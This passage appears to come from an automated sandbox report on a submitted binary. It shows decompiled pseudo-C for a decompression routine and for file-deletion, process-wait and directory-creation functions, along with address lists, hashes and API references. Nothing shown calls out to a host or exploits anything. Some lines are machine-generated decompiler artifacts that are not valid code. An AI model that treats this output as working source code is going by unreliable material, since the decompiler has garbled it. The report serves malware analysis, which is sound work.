														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00406f07
0x00406f07
0x00406f0b
0x00406f34
0x00406f3e
0x00406f0d
0x00406f16
0x00406f23
0x00406f26
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x0040726a
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00000000
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x004072e6
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x00000000
0x004072ec
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x0040726d
0x0040726a

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00405BCB Relevance: 4.5, APIs: 3, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00405BCB(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00405FD2(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}

0x00405bcc
0x00405bd7
0x00405bdc
0x00405c0c
0x00000000
0x00405c0c
0x00405be3
0x00405be4
0x00405bee
0x00405be6
0x00405be6
0x00405be6
0x00405bf6
0x00405c02
0x00405c06
0x00405c06
0x00000000
0x00405bf8
0x00000000
0x00405bfa

APIs

Part of subcall function 00405FD2: GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
Part of subcall function 00405FD2: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405FEB

RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405DAD), ref: 00405BE6
DeleteFileW.KERNEL32(?,?,?,00000000,00405DAD), ref: 00405BEE
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C06

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
Instruction ID: 9515068513ade5ae1f55316d2df80b31020678a3208768e1cfdcfcd0005f1fec
Opcode Fuzzy Hash: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
Instruction Fuzzy Hash: 98E0E53110CB915AD21067348D08B5F7AE8EF86314F04093AF891F10C0D7789807CA7A

Uniqueness

Uniqueness Score: -1.00%

Function 0040697F Relevance: 4.5, APIs: 3, Instructions: 27
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040697F(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406910(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}

0x00406990
0x004069a7
0x0040699b
0x004069a5
0x004069a5
0x004069b2
0x004069be

APIs

WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 004069A5
GetExitCodeProcess.KERNELBASE ref: 004069B2

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: ObjectSingleWait$CodeExitProcess
String ID:
API String ID: 2567322000-0
Opcode ID: b4e22deffd65f84e370c04cbd1d88a1e749a9585608b68ea3518500749b930bb
Instruction ID: 36eed24e95c07865df7b56cd3c3a37613c402ee52c1e894a6bace4c6932a2b17
Opcode Fuzzy Hash: b4e22deffd65f84e370c04cbd1d88a1e749a9585608b68ea3518500749b930bb
Instruction Fuzzy Hash: 25E0D8B1600508FBDF109B55DD06E9E7B6EDB84700F110037F601B61A0C7B6AE61DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405E81(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E03(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AB5( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405AD2(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A38( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406507(0x436000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A38: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B

SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

